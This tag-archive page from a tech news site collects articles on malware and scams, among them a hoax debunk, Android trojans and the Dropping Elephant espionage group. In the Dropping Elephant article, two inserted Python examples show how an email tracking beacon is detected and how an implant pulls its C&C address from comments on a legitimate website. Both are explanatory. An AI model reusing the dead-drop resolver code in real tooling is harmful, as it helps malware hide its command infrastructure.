Tag Archives: Trojan

Are Hackers Using Good Morning Messages To Hack You?

Can Hackers Use Good Morning Greetings To Hack You?

Can hackers use Good Morning videos, pictures and messages to hack your devices, and steal your data?

Find out what is happening, and what the FACTS really are!


Claim : Hackers Are Using Good Morning Messages To Hack You!

This post about Chinese hackers using Good Morning videos, pictures and messages to hack your devices, keeps going viral on social media and WhatsApp.

It’s a long message, so just skip to the next section for the facts!

Dear friends, please delete all welcome photos and videos in Good Morning format and the like. Read below the article to the end, which will be clear why I ask about it. From now on I will only send personally prepared greetings.

Read it all !!! Send this message urgently to as many friends as you can to stop the invasion.

Olga Nikolaevna Lawyer: Caution:


For those who like to send Good Morning pictures! Good day! Good evening!

Do not send these “good” messages.

Today, Shanghai China International News sent SOS to all subscribers (this is the third reminder) that experts recommend: please do not send good morning, good night, pictures and videos.


Truth : Good Morning Greetings Not Being Used To Hack You!

Many of us get spammed with Good Morning or Good Night messages every day from family and friends.

While they often clog up Facebook, Telegram and WhatsApp groups, they really do NOT allow hackers to hack your devices.

Here are the reasons why Good Morning messages are very irritating, but harmless…

Fact #1 : Shanghai China International News Does Not Exist

The news organisation that was claimed to be the source of this warning – Shanghai China International News – does not exist!

Fact #2 : Good Morning Greetings Not Created By Hackers

Hackers (from China or anywhere else) have better things to do than to create these Good Morning pictures and videos.

They are mostly created by websites and social media influencers for people to share and attract new followers.

Fact #3 : No Fraud Involving Good Morning Messages

There has been no known fraud involving Good Morning or even Good Night messages, videos or pictures.

Certainly, half a million victims of such a scam would have made front page news. Yet there is not a single report on even one case… because it never happened.

Fact #4 : Image-Based Malware Is Possible, But…

Digital steganography is a method by which secret messages and other data can be hidden in digital files, like a photo or a video, or even a music file.

It is also possible to embed malicious code within a Good Morning photo, but it won’t be a fully-fledged piece of malware that can execute by itself: an image viewer displays the pixels, it does not run them.

At most, it can be used to hide the malware payload from antivirus scanners, which is pretty clever to be honest…

Fact #5 : Image-Based Malware Requires User Action

In January 2019, cybercriminals created an online advertisement with a script that appeared innocuous and would pass any malware check.

However, the image itself had an “almost white” rectangle that was recognised by the script, triggering it to redirect the user to the cybercriminals’ website.

Once there, the victim is tricked into installing a Trojan disguised as an Adobe Flash Player update.

Such a clever way to bypass malware checks, but even so, this image-based malware requires user action.

You cannot get infected by the Trojan if you practice good “Internet hygiene” by not downloading or installing anything from unknown websites.

Fact #6 : Malicious Code Executes Immediately

If you accidentally download and trigger malware, it will execute immediately. It won’t wait, as the hoax message claims.

Deleting Good Morning or Good Night photos or videos will free up storage space in your phone, but it won’t prevent any malware from executing.

There is really no reason for malware to wait before it infects your devices. Waiting will only increase the risk of detection.

Whether the malware serves to take over your device, steal your information or encrypt it for ransom, it pays to do it at the first opportunity.

Now that you know the facts, please SHARE this article with your family and friends!



Dr. Adrian Wong has been writing about tech and science since 1997, even publishing a book with Prentice Hall called Breaking Through The BIOS Barrier (ISBN 978-0131455368) while in medical school.

He continues to devote countless hours every day writing about tech, medicine and science, in his pursuit of facts in a post-truth world.




Support Tech ARP!

Please support us by visiting our sponsors, participating in the Tech ARP Forums, or donating to our fund. Thank you!

Malware Alert : How Shopper Takes Over Android Phones!

An Android malware called Shopper is actively taking over smartphones, to post fake reviews on Google Play… and worse!

Find out what’s going on, and how to prevent your smartphone from being hijacked by Shopper!


Shopper : What Does It Do?

Shopper (Trojan-Dropper.AndroidOS.Shopper.a) is an Android trojan that uses the Google Accessibility Service to take over your smartphone.

It is not yet known how users are being infected, but researchers suspect that it may be downloaded through fraudulent ads, or third-party app stores when they try to download legitimate apps.

The malware masks itself as a system application, and uses a system icon called ConfigAPKs to hide itself from the user.

After the user unlocks the screen, the Shopper trojan launches and gathers information about the device, which is then sent to the attacker’s servers.

The attacker’s servers will then send commands to the Shopper trojan to execute one or more of these actions :

  • Check the rights to use the Accessibility Service. If permission is not granted, it will send a phishing request until it gets it
  • Turn off Google Play Protect, a safety check on Google Play Store apps before they’re downloaded
  • Post fake positive app reviews in Google Play, for those apps
  • Open links received from the remote server in an invisible window
  • Download and install advertised apps from Google Play Store
  • Download and install apps from the Apkpure third-party app store
  • Show ads when the smartphone screen is unlocked
  • Create labels (shortcuts) to advertised ads in the app menu
  • Replace the labels of your installed apps with labels of advertised websites
  • Use your Google or Facebook account to register on popular shopping and entertainment apps, like AliExpress, Lazada, Zamora, Shein, Joom, Likee and Alibaba


Shopper : Who’s Getting Infected?

Right now, Kaspersky researchers say that it is most widespread in Russia (28.46%), followed by Brazil (18.70%) and India (14.23%).


Shopper : How To Block It?

To reduce the risk of being infected by Trojan-Dropper.AndroidOS.Shopper.a, take these actions :

  • Do NOT install apps from untrusted sources
  • Block the installation of apps from unknown sources in your smartphone settings
  • Be wary of apps that require the use of the Google Accessibility Service, especially if the app is not meant to offer accessibility features to the disabled
  • Always check application permissions to see what your installed apps are allowed to do
  • Use a reliable mobile security solution





84% of New PCs with Pirated Software Infected with Malware!

A recent Microsoft PC test purchase sweep revealed that 84% of new PCs sold in Asia with pirated software were infected with malware. Here are the details of their report…


The Microsoft Asia PC Test Purchase Sweep

The Microsoft Asia PC Test Purchase Sweep examined a total of 166 new PCs from 9 markets across Asia – India, Indonesia, Korea, Malaysia, Philippines, Singapore, Taiwan, Thailand and Vietnam.

The PC samples selected were purchased from retailers that offered PCs at much lower cost and free software bundles to lure customers. In many cases, these retailers also sold pirated software at their store.


84% of New PCs with Pirated Software Infected With Malware!

The sweep found that one of the most common practices for vendors installing pirated software on new PCs is to turn off the security features, such as anti-virus software and Windows Defender, because doing so allows them to run the hack-tools needed to activate the pirated software.

However, this leaves PCs vulnerable to malware and other cyberthreats, and the buyers of these PCs may not even realize that their PC is not being protected.

The sweep also uncovered that 84% of the new PCs loaded with pirated software were infected with some type of malware, with the most common malware being :

  • Trojans are a type of malware that is employed by cybercriminals to gain remote access and control of devices, allowing them to spy on the users and steal private data. While Trojans typically depend on some form of social engineering to trick users into loading and executing them, bundling them with pirated software makes it easier for cybercriminals to compromise and control PCs.
  • Viruses are another type of malware which can cause infected computers to do a variety of things which are not beneficial to the PC owner, such as terminating devices’ security features, sending spam messages, and contacting remote hosts to download additional malware.

These findings are particularly concerning as customers buy PCs that offer special deals which are cheap and come with free software, not realizing the risks they may be exposing themselves to. In most cases, they may not even realize that the security features of their PCs are turned off and may fail to spot suspicious activities on their devices.

Many of these infected PCs’ users are highly susceptible to data loss, including personal documents and sensitive information such as passwords and banking details, as well as identity theft where they lose control of their social media and email accounts. Users might also experience compromised PC performance as malware, running in the background, can slow down devices.

All these factors can lead to consumers and businesses chalking up significant monetary, time and productivity losses as they work to resolve the issues.


Key Cyber-Hygiene Practices for Individuals and SMEs

The most fundamental step that users can take to safeguard themselves digitally is to always insist on buying PCs from established retailers and not ones that also sell pirated software, and ensuring they are getting genuine software. Consumers should refer to software vendors’ websites to learn how they can distinguish between genuine and pirated software.

Besides using genuine software, people can also consider and adhere to the following recommendations to better protect themselves:

  • Keep software current with the latest security patches, which are always free.
  • Follow safe Internet practices and do not visit potentially dangerous websites, such as those that offer adult content, illegal downloads, and pirated software, as well as file sharing portals.
  • Avoid using very old software which has reached its end of life and is no longer supported by the software vendor for updates and security patches.





Kaspersky : Attackers Hiding Ztorg Trojan Inside Trojan SMS

Kaspersky Lab experts have discovered Ztorg apps on the Google Play Store that appear to show cybercriminals trying different ways to get their malware past security – in this case by installing their malicious code in stages and wrapping a Trojan SMS around an encrypted rooting Trojan.

The attackers used the Trojan SMS to make money from victims through Premium-rate SMS while they waited to execute the rooting Trojan. The apps were downloaded more than 50,000 times since mid-May, 2017, but have now been removed from Google Play.


Attackers Hiding Ztorg Trojan Inside Trojan SMS

The determination of cybercriminals to infect Android devices with Ztorg malware through the Google Play Store shows no signs of slowing down, with attackers constantly adapting their tools and techniques to avoid discovery. In May 2017, Kaspersky Lab researchers discovered what appeared to be a standalone Ztorg variant, a Trojan SMS.

On closer inspection, it turned out to contain an encrypted Ztorg rooting Trojan. The Ztorg SMS was found in two apps, a browser and a “noise detection” application. The browser app, which was downloaded 50,000 times, was uploaded to Google Play on 15 May, and never updated – possibly because it was a test run to see if the functionality worked.

The researchers were able to make a more detailed study of the “noise detection” app, uploaded on 20 May and installed more than 10,000 times before being deleted by Google. Their analysis suggests the cybercriminals’ ultimate aim was to execute a regular version of the Ztorg Trojan.

But since they had opted for a stage-by-stage approach involving a series of clean and then malicious updates, they added some supplementary malicious functionality to make money while they were waiting to run the rooting malware.

The Ztorg SMS functionality allows the app to send premium rate SMS, delete incoming SMS and switch off sound.

“The Ztorg Trojan continues to appear on the Google Play Store, accompanied by new tricks to bypass security and infect as many different Android devices and OS versions as possible. Even if a victim downloads what is clearly a clean app, there is no guarantee that it will still be clean in a few days’ time. Users, Google and security researchers need to remain vigilant at all times and to be proactive about protection,” said Roman Unuchek, Senior Malware Analyst, Kaspersky Lab.

Kaspersky Lab advises users to install a reliable security solution, such as Kaspersky Internet Security for Android, on their device, always check that apps have been created by a reputable developer, keep their OS and application software up-to-date, and not download anything that looks at all suspicious or whose source cannot be verified.




F-Secure Explains Security as a Service (SaaS)

Security as a Service offers businesses stronger cybersecurity profiles

The age of information technology has brought with it many business advantages. In fact, much of the world today is still constantly adapting to ongoing advances and innovation. Borderless trade and digital economies thrive and offer business large and small endless potential.

Yet the benefits of digital come along with an ugly side – cyberthreats. Once merely the domain of bored young tech gurus, cyberthreats today have grown to become one of the largest dangers to businesses. From malware to ransomware, cybercriminals cost organizations billions of dollars in damages and lost revenue globally.

Gone are the days where simple anti-virus platforms could protect business systems. Yet with rapidly evolving and increasingly advanced cyberthreats on the horizon, how many organizations can create and maintain teams of cybersecurity experts to defend their systems?


Focus on innovating for business objectives

According to Amit Nath, Head of Asia Pacific – Corporate Business at F-Secure, operational business issues and in-house technical limitations fundamentally face uphill challenges compounded by malware, trojans, phishing, social engineering, ransomware and more. These threats occur at almost every single layer of all business verticals.

Even as technical departments struggle on increasingly limited budgets to innovate within the organization to support business functions, malicious hackers are spitting out variants of their harmful code on a daily basis.

“Even a few small tweaks to change a piece of malicious code needs to be recognized in order to be defended against. Chunks of code being transferred to unknown destinations of the Internet through the dark web further escalates the problem,” said Nath.

The most frightful thought of all now is that ‘black hats’ are catering to the uninitiated and offering for sale destructive code in ready to use formats. Almost anyone who wants to cause trouble or mount advanced cyberattacks against any organization can do so; for a price.


Fight the war with Security as a Service

Knowing that cybercriminals are now offering what is essentially Cybercrime as a Service, organizations need to recognize that this is a fight they cannot win on their own.

“We are increasingly seeing that firms fail to protect themselves properly up to the extent that many don’t even realise when breaches occur. By the time they realise it, problems are often to the extent that they have no option but to outsource ‘cures’ to specialists for exorbitant fees,” said Nath.

This results in organizations paying to maintain their own technical teams, paying for outsourcing for problem clean-ups and yet still facing the potential financial and reputational damage from data loss!

“The situation is critical. So many backdoors are left poorly or totally unguarded. With increasing data privacy laws being enforced around the world the situation looks dire for many businesses,” he said.

Businesses today need to recognise that failing to protect themselves is no longer an option. However, they also need to realise that they don’t have to cope with these massive barriers on their own. Security companies today offer levels of protection that even malicious hackers find daunting, so the simplest solution would be to opt for Security as a Service as the most rational route out of their predicament.


How does Security as a Service work?


“The companies that rely on themselves very often find themselves in extremely defensive positions. It likens to an infantryman in a battle, where he sits in a foxhole and has no scouting support, simply dealing with attacks that come in one after the other. Sooner or later, the enemy will get through,” said Nath.

“We have for so many years built on the security business, evolving ahead of the threats. Our business is security and we not only deal with what we see, but work ahead to predict what we cannot see. Thanks to this mindset and capability, we are able to offer unprecedented degrees of robustness and resilience to organization,” he explained.

The path towards a safer future is a tough and long one, and security-aware businesses should adopt the right level of strategic planning. Options such as Security as a Service can offer protection not only from current, but also future threats.

“As businesses work towards digital transformation goals, they need to know that they have the option to ensure painless high-levels of security at any time, thanks to Security as a Service,” he concluded.



Kaspersky Labs: Pokémon Go Malware In Google Play

15 September 2016 – Kaspersky Lab experts have discovered a new Pokémon Go malware on the Google Play store: “Guide for Pokémon Go”. This Trojan is capable of seizing root access rights on Android smartphones and using that to install/uninstall apps and display unsolicited ads. The app has been downloaded more than 500,000 times, with at least 6,000 successful infections. Kaspersky Lab has reported the Trojan to Google and the app has been removed from Google Play.


Pokémon Go Malware Found In Google Play

The global phenomenon of Pokémon Go has resulted in a growing number of related apps and, inevitably, increased interest from the cybercriminal community. Kaspersky Lab’s analysis of the “Guide for Pokémon Go” Trojan has uncovered malicious code that downloads rooting malware, securing access to the core Android OS for the purposes of app installation and removal as well as the display of advertising.

The Pokémon Go malware includes some interesting features that help it to bypass detection. For example, it doesn’t start as soon as the victim launches the app. Instead, it waits for the user to install or uninstall another app, and then checks to see whether that app runs on a real device or on a virtual machine. If it’s dealing with a device, the Trojan will wait a further two hours before starting its malicious activity.

Even then, infection is not guaranteed. After connecting with its command server and uploading details of the infected device, including country, language, device model and OS version, the Trojan will wait for a response. Only if it hears back will it proceed with further requests and the downloading, installation and implementation of additional malware modules.

This approach means that the control server can stop the attack from proceeding if it wants to – skipping those users it does not wish to target, or those which it suspects are a sandbox/virtual machine, for example. This provides an additional layer of protection for the malware.

Once rooting rights have been enabled, the Trojan will install its modules into the device’s system folders, silently installing and uninstalling other apps and displaying unsolicited ads to the user.

Kaspersky Lab analysis shows that at least one other version of the malicious Pokémon Guide app was available through Google Play in July 2016. Further, researchers have tracked back at least nine other apps infected with the same Trojan and available on Google Play Store at different times since December 2015.


Over 6,000 Successful Infections And Counting

Their data suggests that there have been just over 6,000 successful infections to date, including in Russia, India and Indonesia. However, since the Pokémon Go malware is oriented towards English-speaking users, people in such geographies, and more, are also likely to have been hit.


“In the online world, wherever the consumers go, the cybercriminals will be quick to follow. Pokémon Go is no exception. Victims of this Trojan may, at least at first, not even notice the increase in annoying and disruptive advertising, but the long term implications of infection could be far more sinister.

If you’ve been hit, then someone else is inside your phone and has control over the OS and everything you do and store on it. Even though the app has now been removed from the store, there’s up to half a million people out there vulnerable to infection – and we hope this announcement will alert them to the need to take action,” said Roman Unuchek, Senior Malware Analyst, Kaspersky Lab.

People concerned that they may be infected with the Pokémon Go malware should scan their device with mobile antivirus. If they are infected, there are tools available to help them remove the rooting malware, which can be a complex process.

In addition, Kaspersky Lab advises users to always check that apps have been created by a reputable developer, to keep their OS and application software up-to-date, and not to download anything that looks at all suspicious or whose source cannot be verified.



F-Secure: NanHaiShu Malware Study Findings

F-Secure finds cyberattacks becoming increasingly targeted

The use of the NanHaiShu Remote Access Trojan coincides with events leading to the recent ruling in the Philippines vs. China case.

The world has been undergoing remarkable transformation due specifically to the advancement of the cyber-age. This is due to increasingly strong digital infrastructure as well as the explosion in use of digital devices and technologies. However, it is that very advancement that has opened corporates and even government around the world to heightened scrutiny from cyber criminals.

While some cyberattacks are no doubt being aimed at global supply chains, yet more are becoming very specifically targeted in purpose, being utilised by anyone ranging from hacktivists to hostile governments.

“These groups have learned the layout of the new playing field, and are getting more competent in the way they are able to exploit the vulnerabilities that corporates and governments are exposed to, due to increasing reliance on automated and digital systems,” said Amit Nath, Head of Asia Pacific, Corporate Business, F-Secure.

Governments under siege by NanHaiShu

As a strong case example, F-Secure Labs very recently found a strain of malware that appears to be targeting parties involved in the recently decided Philippines vs. China case. This portion of the South China Sea dispute has recently been of high profile, given the favourable ruling towards the Philippines under arbitration provisions of the United Nations Convention on the Law of the Sea (UNCLOS).

The malware itself, dubbed NanHaiShu by F-Secure researchers, is a Remote Access Trojan that allows attackers to exfiltrate data from infected machines. More significant is what the malware represents: that geopolitics is just as relevant as ever in the face of threats related to cybersecurity.

According to Nath, the malware associated with the incident appears to have targeted organizations that are related to the case, and is specifically designed to do so.

“NanHaiShu was spread using phishing emails and contained content-specific keywords that had the exact targets in mind. The objective of the malware seemed to be to enable its designers to gain greater insight on the status of the legal proceedings in the case,” said Nath.

An F-Secure study released regarding the NanHaiShu incident states that targets included the Department of Justice of the Philippines, the organizers of the Asia-Pacific Economic Cooperation (APEC) Summit and an international law firm representing one of the involved parties.



Cybercriminals evolve, realise true value of information

Nath feels that wherever geopolitical rivalries occur today, cyber exchanges are increasingly prevalent too. “This is especially true in cases where cyber criminals have the leverage of targeting countries that have cyberspace infrastructure but are weak on governance,” said Nath.

The technical analysis exposed the malware’s notable orientation toward code and infrastructure associated with developers in mainland China. Owing to that, and to the fact that the selection of organizations targeted for infiltration are directly relevant to topics that are considered to be of strategic national interest to the Chinese government, F-Secure researchers suspect the malware to be of Chinese origin.

Although the NanHaiShu malware was utilised mainly for intelligence gathering, other such malware seldom is, and cybercriminals of today have been known to cause operational shutdowns, equipment damage, reputation damage and more.

“These criminals have advanced to the point that they are not only highly competent in terms of their technical ability, but they have even become very much aware of the real value of their ill-gotten gains,” said Nath.

“They know exactly how to monetize what they steal, and in fact are not beyond even being able to use the information to influence business dynamics,” he said. As an example, Nath mentioned the case where market-sensitive information was stolen from more than 100 companies, to be traded for profits on the stock market.

With these examples, it is clear that cybercriminals of today have become a formidable force and it is only with the aid of highly experienced and skilled cybersecurity professionals such as F-Secure that a semblance of normalcy can be maintained.



Dropping Elephant Cyber-Espionage Group Exposed

Petaling Jaya, 8 July 2016 – In February 2016, following an alert from a partner, Kaspersky Lab’s Global Research and Analysis Team began an investigation. It quickly became clear that a threat actor, likely operating from India, was undertaking aggressive cyber-espionage activity in the Asian region, targeting multiple diplomatic and government entities with a particular focus on China and its international affairs. Having only old exploits and unremarkable tools in their arsenal, the actor also tried its luck in attacking high profile targets including some Western entities.


Dropping Elephant

The modus operandi of “Dropping Elephant” (also known as “Chinastrats”) could hardly be called sophisticated. The attackers rely heavily on social engineering and low-budget malware tools and exploits. However, this approach seems to be effective, which makes this actor a dangerous one. From November 2015 to June 2016, the actor profiled hundreds to thousands of targets all around the world. On top of this, within the first couple of months of the operation they managed to steal documents from at least a few dozen selected victims.

Tools: simple, yet effective

  • For initial target profiling, Dropping Elephant mass-mails a number of email addresses it has collected on the basis of their relevance to its goals. The spear-phishing emails sent by the attackers contain references to remote content – it is not embedded in the email itself, but downloaded from an external source. The email has no malicious payload, except a simple “ping” request that is sent to the attackers’ server if the target opens the email. This automatically sends a message which contains some basic information about the recipient: IP address, type of browser and both the device used and its location.
  • After using this simple method to filter out the most valuable targets, the attackers proceed with another, more targeted spear-phishing email. This is either a Word document with CVE-2012-0158 exploit, or PowerPoint slides with an exploit for the CVE-2014-6352 vulnerability in Microsoft Office. Both exploits are public and have been known for a long time, but are still effective.
  • Some victims are targeted by a watering hole attack: they receive a link to a website disguised as a political news portal, focused on China’s external affairs.

The majority of links on this website lead to additional content in the form of a PPS (PowerPoint Slides document) with a malicious payload inside.

Even though the vulnerabilities used in the attacks were patched by Microsoft, the attackers can still rely on a social engineering trick to compromise their targets if they ignore multiple security warnings displayed and agree to enable dangerous features of the document. The content of the malicious PPS is based on carefully chosen, genuine news articles featuring widely discussed geopolitical topics, which makes the document look more trustworthy and likely to be opened. This leads many users to become infected.

  • After successful exploitation of the vulnerability, a range of malicious tools is installed on the victim’s machine.
  • These tools then collect and send the attackers the following types of data: Word documents, Excel spreadsheets, PowerPoint presentations, PDF files, and login credentials saved in the browser.
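The profiling step at the start of this chain relies on the recipient’s mail client fetching remote content when the message is rendered. The following Python script is an added example, not code from the Kaspersky Lab report or from the Dropping Elephant toolset: it parses a constructed sample email and lists the remote resources a client would fetch automatically, which is the check a mail gateway or an analyst would run to spot a tracking “ping”. The addresses and hostnames in the sample are placeholders, not indicators from the report.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message (not from the report). Its only "payload" is a
# 1x1 remote image: rendering the mail fetches it, which tells the sender the
# message was opened and hands over the recipient's IP address and User-Agent.
SAMPLE_EMAIL = b"""From: press-office@example.org
To: target@example.net
Subject: Briefing: regional maritime developments
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Please find the latest briefing below.</p>
<img src="http://tracker.example.com/open.gif?id=target%40example.net" width="1" height="1">
<p><a href="https://news.example.org/article/12">Full article</a></p>
</body></html>
"""

REMOTE_SCHEMES = {"http", "https"}

# Tag/attribute pairs a mail client fetches on its own when it renders the
# message. Links (<a href>) need a click and are tracked separately.
AUTO_FETCH = {
    ("img", "src"),
    ("link", "href"),
    ("iframe", "src"),
    ("source", "src"),
    ("video", "poster"),
}


class RemoteRefParser(HTMLParser):
    """Collects remote URLs from an HTML body, split by whether they auto-load."""

    def __init__(self):
        super().__init__()
        self.auto_fetch = []
        self.clickable = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if not value or urlparse(value).scheme.lower() not in REMOTE_SCHEMES:
                continue
            if (tag, name) in AUTO_FETCH:
                self.auto_fetch.append(value)
            elif tag == "a" and name == "href":
                self.clickable.append(value)
        # Inline CSS background images are fetched automatically as well.
        style = dict(attrs).get("style") or ""
        if "url(" in style:
            start = style.index("url(") + 4
            end = style.find(")", start)
            if end != -1:
                url = style[start:end].strip("'\" ")
                if urlparse(url).scheme.lower() in REMOTE_SCHEMES:
                    self.auto_fetch.append(url)


def find_remote_references(raw_message: bytes) -> dict:
    """Parse an RFC 5322 message and list the remote content its HTML parts reference."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    parser = RemoteRefParser()
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            parser.feed(part.get_content())
    return {
        "auto_fetch": parser.auto_fetch,
        "beacon_hosts": sorted({urlparse(u).hostname for u in parser.auto_fetch}),
        "clickable": parser.clickable,
    }


def tracking_candidates(raw_message: bytes) -> list:
    """Auto-fetched URLs that carry a per-recipient token in the query string.

    A remote image whose URL embeds the recipient's address or an ID is the
    classic open-tracking beacon; a plain logo with no query string tells less."""
    refs = find_remote_references(raw_message)
    return [u for u in refs["auto_fetch"] if urlparse(u).query]


if __name__ == "__main__":
    report = find_remote_references(SAMPLE_EMAIL)
    print("auto-fetched remote content:", report["auto_fetch"])
    print("hosts that learn the message was opened:", report["beacon_hosts"])
    print("likely tracking beacons:", tracking_candidates(SAMPLE_EMAIL))
```

The request the beacon triggers carries the recipient’s IP address and User-Agent string, which is exactly the data the profiling step collects. The practical countermeasures are to configure mail clients not to load remote content by default and, at the gateway, to strip or rewrite auto-fetched remote references in messages from unknown senders.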

In addition to social engineering and exploits for old vulnerabilities, one of the Dropping Elephant backdoors uses a C&C communication method borrowed from other threat actors: it hides the real location of the C&C server in comments posted on articles on legitimate public websites. This technique has previously been observed, with a far more complex execution, in operations conducted by Miniduke and other threat actors. The aim is to make the attack harder to investigate, since the backdoor first contacts an innocuous-looking website rather than the C&C server itself.
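To make the dead-drop technique concrete, here is an added Python example (not the Dropping Elephant backdoor’s actual code or data format) of how a backdoor can recover its C&C address from a reader comment on a legitimate article page. The marker string, the base64 encoding, the four-character integrity tag and the sample page layout are all assumptions made for this illustration; the C&C address is in the RFC 5737 documentation range.

```python
import base64
import hashlib
import re

# Marker the implant looks for in comment text. Assumed for this example;
# the real actor's format is not described on this page.
MARKER = "#tp"


def drop_tag(url: str) -> str:
    """Short integrity tag so the implant ignores unrelated base64 in comments."""
    return hashlib.sha256(url.encode()).hexdigest()[:4]


def encode_drop(url: str) -> str:
    """Attacker side: the text of the comment that carries the C&C location."""
    payload = base64.b64encode(url.encode()).decode()
    return f"{MARKER} {payload} {drop_tag(url)}"


# Assumed page layout: one <p class="comment"> per reader comment.
COMMENT_RE = re.compile(r'<p class="comment">(.*?)</p>', re.S)
DROP_RE = re.compile(re.escape(MARKER) + r"\s+([A-Za-z0-9+/=]+)\s+([0-9a-f]{4})")


def resolve_c2(page_html: str):
    """Implant side: scan the comments of a fetched article for the dead drop.

    Returns the C&C URL, or None if no comment carries a well-formed drop."""
    for comment in COMMENT_RE.findall(page_html):
        match = DROP_RE.search(comment)
        if not match:
            continue
        try:
            url = base64.b64decode(match.group(1), validate=True).decode()
        except (ValueError, UnicodeDecodeError):
            continue
        if drop_tag(url) != match.group(2):
            continue  # looks like a drop but was not posted by the operator
        return url
    return None


def build_sample_page(drop_comment: str) -> str:
    """Constructed article page with reader comments; one of them is the drop."""
    return f"""<html><body>
<h1>Regional summit concludes</h1>
<div class="comments">
  <p class="comment">Great coverage, thanks.</p>
  <p class="comment">{drop_comment}</p>
  <p class="comment">When is the next session?</p>
</div>
</body></html>"""


# Constructed C&C address in the RFC 5737 documentation range, not a real host.
C2_URL = "http://192.0.2.44/update.php"
SAMPLE_PAGE = build_sample_page(encode_drop(C2_URL))

if __name__ == "__main__":
    print("comment posted by the operator:", encode_drop(C2_URL))
    print("address recovered by the implant:", resolve_c2(SAMPLE_PAGE))
```

The detection consequence is that the implant’s first network contact is an ordinary-looking fetch of a legitimate website, so domain reputation alone will not catch it. What stands out is which process makes the request: an Office child process or an unknown binary fetching an article’s comment section shortly after a document was opened is worth an alert, and the operator can move the C&C at any time simply by posting a new comment.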

Geographical preferences

Based on the target profile created by the Kaspersky Lab researchers, Dropping Elephant is focused on two main groups of organizations and individuals: China-based government and diplomatic entities and the individuals connected to them, and the partners of those organizations in other countries.

In total, Kaspersky Lab experts were able to identify several hundred targets worldwide, most of them located in China, while others were from or related to Pakistan, Sri Lanka, Uruguay, Bangladesh, Taiwan, Australia, the USA and some other countries.


There are indicators that this actor operated from India; at the same time, there is no solid proof that a nation-state is involved in this operation.

The analysis of activity reveals that the attackers probably operated in the time zone of either UTC+5 or UTC+6. Interestingly enough, since May 2016, Kaspersky Lab researchers have spotted a new activity pattern for the group in a new geographical area that includes Pacific Standard Time zone, corresponding – among others – to West Coast working hours in the US. This is likely to be the result of increased headcount in the Dropping Elephant team.

“Despite using such simple and affordable tools and exploits, the team seem capable of retrieving valuable intelligence information, which could be the reason why the group expanded in May 2016. The expansion also suggests that it is not going to end its operations anytime soon. Organizations and individuals that match this actor’s target profile should be especially cautious. The good news is that this group hasn’t yet been spotted using really sophisticated, hard-to-detect tools. This means that their activity is relatively easy to identify. This can of course change at any time,” – said Vitaly Kamluk, Head of Research Center in APAC, GReAT, Kaspersky Lab.


Kaspersky Lab is open to working with CERTs and law enforcement agencies of affected countries to notify the owners and mitigate the threat.

In order to protect yourself and your organization from cyber-espionage groups like Dropping Elephant, Kaspersky Lab security experts advise taking the following measures:

  • Follow the basic rules of Internet security: don’t open attachments in emails received from unknown senders and regularly update the software on your PC;
  • Use a proven security solution capable of fighting the most sophisticated cyberthreats;
  • Remember that what looks like a legitimate document could be the first stage of a targeted attack against your company. In large organizations, use proven anti-targeted-attack solutions capable of spotting dangerous anomalies in the corporate network before the malware is installed and the data is stolen;
  • The best way to keep your protection up to date is to track the evolution of targeted attack actors. Use threat intelligence services to ensure you’re aware of what new techniques attackers implement and what protection measures could make these techniques ineffective.

Kaspersky Lab solutions detect and neutralize the Dropping Elephant malware as:

  • Exploit.Win32.CVE-2012-0158
  • Exploit.MSWord.CVE-2014-1761
  • Trojan-Downloader.Win32.Genome
  • HEUR:Trojan.Win32.Generic
  • Trojan.Win32.Agent.ijfx
  • Trojan-Ransom.Win32.PolyRansom.bel
  • Trojan.Win32.Autoit.fdp

Kaspersky Lab also detects the exploits used in the documents.


Support Tech ARP!

If you like our work, you can help support our work by visiting our sponsors, participate in the Tech ARP Forums, or even donate to our fund. Any help you can render is greatly appreciated!

Malicious Spam Emails Spike In Q1 2016

16 May 2016 – The latest Kaspersky Lab Spam and Phishing Report has found that although the volume of spam emails has been decreasing, spam has become more criminalized. At the same time, the number of malicious mailshots has increased dramatically: Kaspersky Lab products prevented 22,890,956 attempts to infect users via emails with malicious attachments in March 2016, twice the number reported in February 2016.

Since 2012 the share of spam in email traffic has been falling steadily. However, the number of emails with malicious attachments has increased significantly: in Q1 2016 it was 3.3 times higher than in the same period of 2015. The amount of ransomware also grew throughout the quarter. It is often propagated through emails with infected attachments, for example Word documents. The most prominent example in Q1 was the ransomware Trojan Locky, which was actively distributed via emails in many languages and targeted at least 114 countries. Locky emails contained fake notifications from financial institutions that tricked users into opening the malicious attachment.

Kaspersky Lab’s findings suggest that fraudsters are turning to spam to target Internet users because web browsing is becoming safer. Almost all popular web browser developers have now implemented security and anti-phishing protection, making it harder for cybercriminals to propagate their malware through infected web pages.

According to Kaspersky Lab’s Q1 report on spam and phishing the main findings for the quarter were:

  • In Q1 2016, spam accounted for 56.3% of email traffic, 2.9 percentage points lower than in the same period of 2015 (59.2%).
  • The largest amount of spam was sent in January (59.6% of overall email traffic). This is explained by the end of the holiday season, when the flow of normal, non-spam emails is usually low.
  • The USA retained its position as the biggest source of spam, sending 12.43% of unwanted emails, a slight decrease from Q1 2015 (14.5%).
  • Other large sources of spam were Vietnam (second place with 10.3%) and India (6.16%). In the same period of 2015, second and third place were held by Russia (7.3%) and Ukraine (5.6%); Russia moved to seventh place this quarter with 4.9%.
  • 81.9% of spam emails in Q1 2016 were very small, up to 2 KB, a 2.8 percentage point increase on the same quarter in 2015. Smaller emails are easier for spammers to handle in mass mailings.
  • Germany was the country most targeted by malicious mailshots: 18.9% of Kaspersky Lab product users in the country were targeted this way. Germany was followed by China (9.43%) and Brazil (7.35%). In the same period of 2015, the top three countries were Great Britain (7.8%), Brazil (7.4%) and the USA (7.2%).


Terrorism became the main topic of spam emails in Q1.

During this quarter fraudsters tried to lure users into opening malicious files, gaining their attention with emails about terrorism, a subject which is always in the news. To prevent terrorist attacks many countries have strengthened their security measures and this has therefore become a popular topic for spam emails.

Some spam fraudsters tried to convince recipients that the file attached to their email contained a new mobile application which, once installed, could detect an explosive device. The email emphasized that the US Department of Defense had discovered this technology and that it was sufficiently simple and accessible. The attachment usually contained an executable file, detected as Trojan-Dropper.Win32.Dapato, malware that can steal personal user information, take part in DDoS attacks and install other malicious software.

